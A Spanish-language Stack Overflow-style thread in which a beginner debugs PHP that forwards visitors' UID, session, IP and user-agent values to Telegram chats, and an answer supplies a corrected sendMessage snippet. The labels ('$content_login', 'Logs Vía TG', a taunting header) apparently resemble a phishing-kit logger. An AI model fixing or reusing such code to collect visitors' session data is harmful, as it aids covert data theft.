# ¿Cómo podría solucionar estos errores de php?

Tags: php, html, telegram

¡Holaaa!

Les comento mi situación, soy nueva en PHP y estoy tratando de obtener el useragent mediante la siguiente línea:

```
$u_agent  = $_SERVER['HTTP_USER_AGENT'];
```

Una vez puesta esa línea, la declaro para que la envíe a Telegram con el siguiente código:

```
$u_agent =  @$_POST['u_agent']; //IP


$content_login = '<pre>
Supremassy Codes Sucks XD
UID             : '.$uid.'
IP: '.$u_agent.'</pre>';
```

Todo esto antes del html. Bueno pues la cuestión es que me llega 5 veces repetido el mensaje y sin el contenido del User agent, es decir me llega así:
UA:
¿Podríais decirme si hay algún error o alguna solución? Gracias :D

Comment: Podrías poner más codigo?  parece que re declaras la variable.

Comment: Este es el archivo de configuración
include 'config.php';


$sesion = @$_POST['sesion']; // Sesion
$ip= @$_POST['ip']; // ip
$u_agent = @$_POST['u_agent']; //UA




$content = '<pre>
UID             : '.$uid.'
Sesion '.$sesion.'
IP: '.$ip.'
UA: '.$u_agent.'</pre>';





/* Conexión Telegram */
if ($telegram_active === 1) {
  /* Logs Vía TG */
  foreach ($chats_id as $chat_id) {
    file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=" . urlencode($content_login)."&parse_mode=HTML" );}}

    ?>

Comment: oops, pensaba que se iba a poner de otra forma más organizada, si puedes copia y pega el code en un php beautifier y así te sale bastante más organizado.

Comment: O espera, te lo pongo en un pastebin, así se ve mucho más claro y ordenado:
https://pastebin.com/ksc5y3tP

Comment: Nada de pastebin ni de recursos externos :) La pregunta se puede editar toooodas las veces que se necesite y allí pones el código, las aclaraciones a las preguntas, etc. Recomiendo que hagas el [recorrido](https://es.stackoverflow.com/tour) para entender el sitio y de paso ganar tu primera medalla. 
También estaría bien que revisaras [Cómo preguntar](https://es.stackoverflow.com/help/how-to-ask) para que recibas respuesta cuanto antes.

Comment: Recuerda que puedes editar tu pregunta cuantas veces sea necesario y añadir la info relevante
(en los comentarios no se ve bien el código como ya viste y abajo sólo van nuestros intentos de respuesta).
La opción editar está justo bajo la pregunta y las etiquetas!

Answer (score 0):

Voy a intentar ayudar aunque falta bastante código para comprender algún problema, como por ejemplo lo de las 5 repeticiones.
Haciendo un copy/paste del código proporcionado da la impresión que lo que tienes que envíar en el parámetro text es $content y no $content_login.
`&text=" . urlencode($content)` en vez de `&text=" . urlencode($content_login)`. (Ésto sacado de tu código PASTEBIN, porque veo que en código inicial si generas $content_login pero el código es incompleto)

```
/* Archivo de Configuración */
include 'config.php';
$sesion = @$_POST['sesion']; // sesion
$ip = @$_POST['ip']; // ip
$u_agent = @$_POST['u_agent']; //UA
 
$content = '<pre>
UID             : '.$uid.'
sesion: '.$sesion.'
ip: '.$ip.'
UA: '.$u_agent.'</pre>';
 
if ($telegram_active === 1) {
  /* Logs Vía TG */
  foreach ($chats_id as $chat_id) {
    file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=" . urlencode($content)."&parse_mode=HTML" );}}
```

Para el tema de las repeticiones habría que ver como se activa, por ejemplo la variable $telegram_active.

Para envíos de información a un canal de Telegram uso este código. Tuve inicialmente muchos problemas de telegrams que recibía dobles y prové varias combinaciones hasta que ésta me funcionó sin problemas.

```
$telegrambot = '<el_token_bot_autorizado>'; // En tu caso $token
$telegramchatid = <el_codigo_del_canal_a enviar>; // En tu caso $chat_id
$url = 'https://api.telegram.org/bot' . $telegrambot . '/sendMessage';
$data = array(
  'chat_id' => $telegramchatid,
  'text' => <el_texto_que_quieres_enviar> // En tu caso $content
);
$opciones = array(
  'http' => array(
    'method' => 'POST',
    'header' => "Content-Type:application/x-www-form-urlencoded\r\n",
    'content' => http_build_query($data)
  )
);
$contexto = stream_context_create($opciones);
file_get_contents($url, false, $contexto);
```

Un saludo!

Comment: Bienvenix a SOes. Gracias por ayudar. Como lo indicas, la pregunta en su estado actual es muy vaga y la idea no es adivinar sino tener una buena pregunta para poder dar buenas respuestas sin tener que rehacer N veces, sin adivinar y que le sirva al OP.

Comment: Coincido, pero se que los que nos iniciamos y queremos colaborar bien con preguntas interesantes como con respuestas también tenemos que "aprender" como generar buenas preguntas y respuestas. Este es un pequeño paso para ir en ese camino que bien indicas.